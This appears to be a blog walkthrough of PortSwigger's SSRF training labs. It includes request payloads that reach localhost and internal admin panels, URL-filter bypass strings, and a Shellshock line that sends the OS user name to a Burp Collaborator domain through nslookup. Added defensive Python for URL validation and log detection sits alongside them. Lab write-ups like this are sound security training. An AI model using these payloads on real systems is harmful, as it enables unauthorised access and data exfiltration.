
Learn SSRF through PortSwigger's web security vulnerability training platform

2020-11-10 14:03:29 week

Preface

PortSwigger is the company behind Burp Suite, and its website is also a very good vulnerability training platform. Its Web Security Academy is at: https://portswigger.net/web-security/

The labs focus on exploring the various functions of Burp Suite in depth. The Academy is also the hands-on companion to The Web Application Hacker's Handbook, and working through both together gives the best results.

This article covers only the SSRF labs, and works through them completely.

SSRF vulnerability overview

Server-side request forgery (SSRF) is a web security vulnerability that allows an attacker to induce a server-side application to make HTTP requests.

In a typical SSRF example, an attacker may cause the server to connect back to itself, to other web-based services within the organisation's infrastructure, or to external third-party systems.

Impact of SSRF attacks

A successful SSRF attack usually results in unauthorised actions or access to data within the organisation, either on the vulnerable application itself or on other back-end systems that the application can communicate with. In some cases, an SSRF vulnerability may allow an attacker to execute arbitrary commands.

Common SSRF attacks

SSRF attacks often exploit trust relationships to escalate an attack from the vulnerable application and perform unauthorised actions. These trust relationships may exist with the server itself or with other back-end systems in the same organisation.

SSRF attacks against the server itself

Vulnerability overview

In an SSRF attack against the server itself, the attacker induces the application to make an HTTP request back to the server hosting the application. This usually involves supplying a URL whose host name is 127.0.0.1 or localhost.

For example, consider a shopping application that lets users check whether a store has a particular item in stock. To provide the stock information, the application must query various back-end REST APIs, depending on the product and store in question. The function is implemented by passing the URL to the relevant back-end API endpoint through a front-end HTTP request. So when a user views the stock status of an item, their browser makes a request like the following:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

This causes the server to make a request to the specified URL, retrieve the stock status, and return it to the user.

In this situation, an attacker can modify the request to specify a URL that is local to the server. For example:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin

Here, the server fetches the contents of /admin and returns them to the user.

Of course, the attacker could just visit /admin directly. But administrative functions are normally accessible only to suitably authenticated users, so an attacker who simply visits the URL sees nothing of interest. However, when the request for the /admin URL comes from the local machine itself, the normal access controls are bypassed. The application grants full access to the administrative functions because the request appears to originate from a trusted location.

Lab: Basic SSRF against the local server

Address: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

Lab description:

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

Solution:

Click Access the lab to enter the lab.

Click Check stock and intercept the request.

Change the stockApi parameter to: http://localhost/admin

Then click to delete the user carlos, intercept the request, and obtain the URL that deletes the target user:

http://localhost/admin/delete?username=carlos

Change the stockApi parameter to this URL and the lab is solved.

The reason for the vulnerability

Why do applications behave this way and implicitly trust requests that come from the local machine? There are several reasons:

(1) The access control check may be implemented in a different component that sits in front of the application server. When a connection is made back to the server itself, the check is bypassed.

(2) For disaster recovery purposes, the application may allow administrative access without logging in to any user coming from the local machine. This gives administrators a way to recover the system if they lose their credentials. The assumption is that only a fully trusted user would be coming directly from the server itself.

(3) The administrative interface may listen on a different port number from the main application, so users may not be able to reach it directly.

This kind of trust relationship, where requests from the local machine are handled differently from ordinary requests, is often what turns SSRF into a critical vulnerability.

SSRF attacks against other back-end systems

Vulnerability overview

Another trust relationship that often arises with server-side request forgery is that the application server can interact with other back-end systems that users cannot reach directly. These systems usually have non-routable private IP addresses. Because the back-end systems are normally protected by the network topology, they often have a weaker security posture. In many cases, internal back-end systems contain sensitive functionality that anyone able to interact with them can access without authentication.

In the earlier example, suppose there is an administrative interface at the back-end URL https://192.168.0.68/admin. Here, an attacker could exploit the SSRF vulnerability to access the administrative interface by submitting the following request:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://192.168.0.68/admin

Lab: Basic SSRF against another back-end system

Address: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system

Lab description:

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

Solution:

Click Access the lab to enter the lab.

Click Check stock, intercept the request, and send it to Intruder.

Set up the payload to iterate over the last octet of the 192.168.0.0/24 range on port 8080.

Find the response with status 200; this is the admin interface.

Then click to delete the user carlos, intercept the request, and obtain the URL that deletes the target user:

http://192.168.0.205:8080/admin/delete?username=carlos

Change the stockApi parameter to this URL and the lab is solved.

Bypassing common SSRF defences

It is common for applications that contain SSRF behaviour to also include defences intended to prevent malicious exploitation. Often, these defences can be circumvented.

SSRF with blacklist-based input filters

Vulnerability overview

Some applications block input that contains host names such as 127.0.0.1 and localhost, or sensitive URLs such as /admin. In this situation, the filter can often be circumvented by:

(1) Using an alternative IP representation of 127.0.0.1, for example 2130706433 (decimal IP), 017700000001 (octal IP), or 127.1 (shortened IP)

(2) Registering your own domain name that resolves to 127.0.0.1

(3) Obfuscating the blocked strings with URL encoding or case variation

Lab: SSRF with blacklist-based input filter

Address: https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter

Lab description:

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

The developer has deployed two weak anti-SSRF defences that you need to bypass.

Solution:

Click Access the lab to enter the lab.

Click Check stock, intercept the request, and send it to Repeater.

Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.

Change 127.0.0.1 to 2130706433 and the filter is bypassed.

Change the URL to http://2130706433/admin and observe that the request is blocked again.

Double-URL-encode the character a to get %2561, or replace a with an uppercase A, and the filter is bypassed.

Change the URL in the stockApi parameter to http://2130706433/%2561dmin/delete?username=carlos to delete the user carlos.

SSRF with whitelist-based input filters

Vulnerability overview

Some applications only allow input that matches, begins with, or contains a whitelist of permitted values. In this situation, the filter can sometimes be circumvented by exploiting inconsistencies in URL parsing.

The URL specification contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs:

(1) You can embed credentials in a URL before the host name, using the @ character. For example:

https://expected-host@evil-host

(2) You can use the # character to indicate a URL fragment. For example:

https://evil-host#expected-host

(3) You can leverage the DNS naming hierarchy to place the required input into a fully-qualified DNS name that you control. For example:

https://expected-host.evil-host

(4) URL-encoding characters can confuse the URL-parsing code. This is especially useful when the code that implements the filter handles URL-encoded characters differently from the code that performs the back-end HTTP request.

Lab: SSRF with whitelist-based input filter

Address: https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter

Lab description:

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

The developer has deployed an anti-SSRF defence.

Solution:

Click Access the lab to enter the lab.

Click Check stock, intercept the request, and send it to Repeater.

Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked, with a message telling us the host name must be stock.weliketoshop.net.

Using the @ character bypasses this check.

Adding # causes the request to be blocked again, with the message that the host name must be stock.weliketoshop.net.

Double-URL-encode the # to bypass the filter:

http://127.0.0.1:80%2523@stock.weliketoshop.net

Finally, visit

http://127.0.0.1:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

to delete the target user.

Bypassing SSRF filters via open redirection

Vulnerability overview

Exploiting an open redirection vulnerability can sometimes bypass any kind of filter-based defence. In the earlier SSRF example, suppose the user-submitted URL is strictly validated to prevent malicious exploitation of the SSRF behaviour. However, the application whose URLs are allowed contains an open redirection vulnerability. If the API used to make the back-end HTTP request supports redirections, you can construct a URL that satisfies the filter and results in a redirected request to the desired back-end target.

For example, suppose the application contains an open redirection vulnerability in which the following URL:

/product/nextProduct?currentProductId=6&path=http://evil-user.net

returns a redirection to:

http://evil-user.net

You can use the open redirection vulnerability to bypass the URL filter and exploit the SSRF vulnerability as follows:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

This SSRF exploit works because the application first validates that the supplied stockAPI URL is on an allowed domain, which it is. The application then requests the supplied URL, which triggers the open redirection. It follows the redirection and makes a request to the internal URL of the attacker's choosing.
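As an added example (not part of the original article or PortSwigger's lab code), here is a Python allowlist validator for the stockApi URL that closes the three bypass routes described in the blacklist, whitelist and open-redirection sections: it makes alternative IP spellings irrelevant by permitting only an exact host name, rejects credentials and fragments ahead of the host, resolves the permitted name and refuses internal addresses, and re-validates every redirect hop instead of letting the HTTP client follow redirects on its own. The host name stock.weliketoshop.net comes from the article; the function names, the allowlist and the sample DNS answer are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# Hypothetical allowlist for the stock-check feature: exact host names, nothing else.
ALLOWED_HOSTS = {"stock.weliketoshop.net"}
REDIRECT_CODES = {301, 302, 303, 307, 308}
# Constructed DNS answers so the demo runs offline; production uses resolve_host().
SAMPLE_DNS = {"stock.weliketoshop.net": {"93.184.216.34"}}

def resolve_host(host):
    """Resolve host to the set of addresses the fetcher would actually connect to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_stock_url(url, resolve=resolve_host):
    """Return None if the URL may be fetched, otherwise the reason it is rejected.
    An allowlist makes 2130706433 / 017700000001 / 127.1 spellings of 127.0.0.1
    irrelevant: whatever they decode to, they are not the one permitted host."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return "credentials before @ are not allowed"      # https://expected-host@evil-host
    if parts.fragment:
        return "fragment not allowed"                       # https://evil-host#expected-host
    if parts.hostname not in ALLOWED_HOSTS:                 # exact match, never startswith/contains
        return "host %r not in allowlist" % parts.hostname  # also rejects expected-host.evil-host
    for addr in resolve(parts.hostname):                    # an allowed name may resolve internally
        ip = ipaddress.ip_address(addr)
        if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved:
            return "host resolves to internal address %s" % ip
    return None

def fetch_stock(url, send, resolve=resolve_host, max_hops=3):
    """Fetch url via send(url) -> (status, headers, body). send must not follow
    redirects on its own (e.g. requests.get(url, allow_redirects=False)), so that
    every hop, including one produced by an open redirect, is validated here."""
    for _ in range(max_hops + 1):
        reason = check_stock_url(url, resolve)
        if reason is not None:
            raise ValueError("refusing %s: %s" % (url, reason))
        status, headers, body = send(url)
        if status not in REDIRECT_CODES:
            return body
        url = urljoin(url, headers["Location"])             # next hop goes through the check too
    raise ValueError("too many redirects")

if __name__ == "__main__":
    for candidate in ("http://stock.weliketoshop.net:8080/product/stock/check?productId=6&storeId=1",
                      "http://2130706433/admin", "http://stock.weliketoshop.net.evil-host/",
                      "http://127.0.0.1:80%2523@stock.weliketoshop.net/admin"):
        print(candidate, "->", check_stock_url(candidate, SAMPLE_DNS.get) or "allowed")
```

The validator checks the string exactly as it will be fetched, so it must run after the framework's single URL decoding and must never decode a second time.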

Lab: SSRF with filter bypass via open redirection vulnerability

Address: https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection

Lab description:

This lab has a stock check feature which fetches data from an internal system.

To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos.

The stock checker is restricted to local applications only, so you first need to find an open redirection that affects the application.

Solution:

Click Access the lab to enter the lab.

Click Check stock, intercept the request, and send it to Repeater.

Observe that the server cannot be made to issue requests directly to other hosts.

Click "Next product" and observe that the path parameter is placed into the Location header of a redirect response, which results in an open redirection.

Create a URL that exploits the open redirection vulnerability and redirects to the admin interface, and feed it into the stockApi parameter:

/product/nextProduct?path=http://192.168.0.12:8080/admin

The stock checker follows the redirection and displays the admin page. Next, modify the path to delete the target user:

/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

Blind SSRF vulnerabilities

Blind SSRF overview

Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application's front-end response.

Blind SSRF is generally harder to exploit, but it can sometimes lead to remote code execution on the server or other back-end components.

Because of the one-way nature of blind SSRF vulnerabilities, their impact is usually lower than that of conventional SSRF. Although they can be exploited for remote code execution in some cases, they cannot easily be used to retrieve sensitive data from back-end systems.

How to find and exploit blind SSRF vulnerabilities

The most reliable way to detect blind SSRF vulnerabilities is to use out-of-band (OAST) techniques. This involves attempting to trigger an HTTP request to an external system that you control, and monitoring for network interactions with that system.

The easiest and most effective way to use out-of-band techniques is Burp Collaborator. You can use the Burp Collaborator client to generate unique domain names, send them as payloads to the application, and monitor for any interaction with those domains. If an incoming HTTP request from the application is observed, an SSRF vulnerability very likely exists.
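The same out-of-band signal is useful on the defending side: a server-side fetch to a callback domain, or to an internal address, shows up in the application's own outbound-request log long before anyone reads the front-end response. As an added example (not from the article), here is a small Python detector run over a constructed sample of such a log; the log format, component names, allowlist and the burpcollaborator.net suffix list are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample of the stock checker's own outbound-request log (one line per
# URL the component fetched). Every server-side fetch should be logged like this.
OUTBOUND_LOG = """\
2020-11-10T14:03:29Z component=stock-check method=GET url=http://stock.weliketoshop.net:8080/product/stock/check?productId=6&storeId=1 status=200
2020-11-10T14:03:31Z component=stock-check method=GET url=http://localhost/admin status=200
2020-11-10T14:03:40Z component=analytics method=GET url=http://abc123.burpcollaborator.net/ status=200
2020-11-10T14:03:42Z component=stock-check method=GET url=http://192.168.0.68/admin status=403
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) component=(?P<component>\S+) method=(?P<method>\S+) "
                     r"url=(?P<url>\S+) status=(?P<status>\d+)$")
ALLOWED_EGRESS = {"stock.weliketoshop.net"}          # hypothetical: the only legitimate destination
OAST_SUFFIXES = (".burpcollaborator.net",)           # out-of-band domains used to confirm blind SSRF

def classify_host(host):
    """Return a reason string if a destination host is suspicious, else None."""
    if host.endswith(OAST_SUFFIXES):
        return "out-of-band callback domain (blind SSRF probe)"
    try:
        ip = ipaddress.ip_address(host)               # literal address rather than a name?
    except ValueError:
        ip = None
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
        return "request to internal address %s" % ip
    if host not in ALLOWED_EGRESS:
        return "destination not on egress allowlist"
    return None

def find_ssrf_alerts(log_text):
    """Scan log lines and return (timestamp, component, host, reason) for each hit.
    A 403 from the internal target is still an alert: the request was sent."""
    alerts = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if match is None:
            continue                                   # malformed line, skip it
        host = (urlsplit(match["url"]).hostname or "").lower()
        reason = classify_host(host)
        if reason is not None:
            alerts.append((match["ts"], match["component"], host, reason))
    return alerts

if __name__ == "__main__":
    for alert in find_ssrf_alerts(OUTBOUND_LOG):
        print(*alert)
```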

Lab: Blind SSRF with out-of-band detection

Address: https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection

Lab description:

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.

To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.

Solution:

Click Access the lab to enter the lab.

Visit a product, intercept the request in Burp Suite, and send it to Burp Repeater.

Start the Burp Collaborator client.

Click "Copy to clipboard" and leave the Burp Collaborator client window open.

Change the Referer header to use the generated Burp Collaborator domain in place of the original domain. Send the request.

Go back to the Burp Collaborator client window and click "Poll now". If no interactions are listed, wait a few seconds and try again, because server-side commands are executed asynchronously.

Lab: Blind SSRF with Shellshock exploitation

Address: https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation

Lab description:

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.

To solve the lab, use this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range. In the attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user via the public Burp Collaborator server.

Solution:

Install the "Collaborator Everywhere" extension in Burp.

Add the target's domain to Burp Suite's scope so that Collaborator Everywhere targets it.

Browse the site. Note that when a product page is loaded, it triggers HTTP interactions with Burp Collaborator via the User-Agent and Referer headers.

Send the request that loads a product page to Burp Intruder.

Use the Burp Collaborator client to generate a unique Burp Collaborator payload and place it in the following Shellshock payload:

() { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net

In the Burp Intruder request, replace the User-Agent string with the Shellshock payload containing your Collaborator domain.

Then, in the Burp Intruder request, replace the Referer string with http://192.168.0.X:8080

When the configuration is complete, click Start attack.

After the attack finishes, go back to the Burp Collaborator client window and click "Poll now". If no interactions are listed, wait a few seconds and try again, because server-side commands are executed asynchronously.

You should then see a DNS interaction initiated by a back-end system that was successfully attacked via blind SSRF. The name of the operating system user appears in the DNS subdomain.

Copyright notice
This article was written by [week]; please include a link to the original when reposting. Thank you.